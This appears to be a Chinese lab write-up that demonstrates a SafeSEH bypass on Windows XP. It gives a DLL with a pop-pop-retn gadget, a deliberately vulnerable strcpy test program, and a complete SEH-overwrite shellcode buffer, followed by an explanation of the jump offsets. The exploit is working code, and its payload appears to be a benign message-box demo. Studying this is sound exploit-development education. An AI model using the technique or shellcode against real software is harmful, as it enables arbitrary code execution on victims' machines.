利用未启用 SafeSEH 模块绕过 SafeSEH

环境：

xp ps3
VS 2008 release版本, 禁用优化
IDA
OD

参考：

http://blog.csdn.net/qq_19550513/article/details/64439930
https://www.52pojie.cn/forum.php?mod=viewthread&tid=495857
《0day2》11.5

代码：

// SEH_NoSafeSEH_JUMP.cpp : Defines the entry point for the DLL application.
#include "stdafx.h"
BOOL APIENTRY DllMain( HANDLE hModule,DWORD  ul_reason_for_call, LPVOID lpReserved){
    return TRUE;
}
void jump(){
__asm{
        pop eax
        pop eax
        retn
        }
}

#include"stdafx.h"
#include<string.h>
#include<windows.h>
char shellcode[]=
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90x90\x90\x90\x90\x90\xeb\x0e""\x90\x90"
            "\xB6\x11\x12\x11"//address of pop pop retn in No_SafeSEH module   0x111211B6
            "\x90\x90\x90\x90\x90\x90\x90\x90" 
            "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C" 
            "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53" 
            "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B" 
            "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95" 
            "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59" 
            "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A" 
            "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75" 
            "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
            "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB" 
            "\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50" 
            "\x53\xFF\x57\xFC\x53\xFF\x57\xF8";
DWORD MyException(void){
    printf("There is an exception");
    getchar();
    return 1;
}
void test(char * input){
    char str[200];
    strcpy(str,input);
    int zero=0;
    __try {
        zero=1/zero;
    }
    __except(MyException()){
    }
}

int main(int argc, _TCHAR* argv[]){
    HINSTANCE hInst = LoadLibrary(TEXT("1.dll"));
    char str[200];
    test(shellcode);
    return 0;
}

思路：

使用VC6 编译 1.DLL ， 在其中找到未开启 safeSEH 的跳板 在主程序中绕过safeSEH
函数 test 中有 strcpy() 栈溢出, 使其覆盖 SEH 异常处理函数地址，使其指向 跳板(1.DLL中未开启safeSEH) ， 使其指向shellcode。

看点1：

在进入__try时会破坏shellcode ， 不会影响shellcode的逻辑，

但在调试时发现，被__try破坏的地方 影响了程序执行流程 ， 无法执行shellcode。

解决办法：
http://blog.csdn.net/qq_19550513/article/details/64439930

使用了段跳板：
短转移偏移量 = 0x0012FEA0 - 0x0012FE90 - 2 = 0x0E
0xeb => jmp

跳板：
\xeb\x0e\x90\x90

看点2：

我们选择pop pop retn的原因是，在进入异常函数处理之时，栈的情况是 esp +8 的位置保存了处理该异常的 SEH 节点首地址 0x0012FE90 ，那为什么这个地址会入栈呢？

简单地讲，在通过 SEH 进行异常处理的时候，会先把当前 SEH 节点的首地址，也就是 nextSEH 的指针压入栈（ 正常情况下，如果第一个节点无法处理该异常，转向下一节点），然后压进去两个现场相关的参数。所以两次 pop 之后，retn 指令赋值给 eip 的内容自然是当前 SEH 节点的首地址 0x0012FE90 了。